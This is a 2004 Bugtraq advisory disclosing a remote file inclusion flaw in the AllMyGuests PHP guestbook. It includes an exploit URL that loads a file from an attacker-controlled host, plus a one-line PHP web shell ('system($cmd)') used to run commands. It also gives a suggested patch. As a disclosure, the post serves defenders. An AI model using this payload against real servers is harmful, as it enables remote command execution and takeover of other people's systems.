Bugtraq mailing list archives
AllMyGuests PHP Code Injection vulnerability
From: Pablo Santana <m4dsk4t3r () hotmail com>
Date: 14 Feb 2004 22:20:29 -0000
******** AllMyGuests PHP Code Injection vulnerability ******** Product : AllMyGuests Vendor : www.php-resource.net Date : February 14, 2004 Problem : PHP Code Injection Vendor Contacted ? : No ************************** Source **************************** in /include/info.inc.php -------------------------------------------------------------- $AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php"); -------------------------------------------------------------- ************************** Exploit *************************** http://[target]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a in http://[attacker]/include/template.inc.php have : ------------------------ <? system($cmd); ?> ------------------------ ************************** Impact **************************** Malicious user execute arbitrary commands on the server . ************************* Solution *************************** in /include/info.inc.php replace $AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php"); for if (isset($_AMGconfig[cfg_serverpath])){ die("Don\'t Hack it :)"); } $AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php"); ************************** Credits **************************** bnfx : bnfx () antisocial com Mad_Skater : m4dsk4t3r () hotmail com TechTeam Brazilian Crew .
Current thread:
- AllMyGuests PHP Code Injection vulnerability Pablo Santana (Feb 16)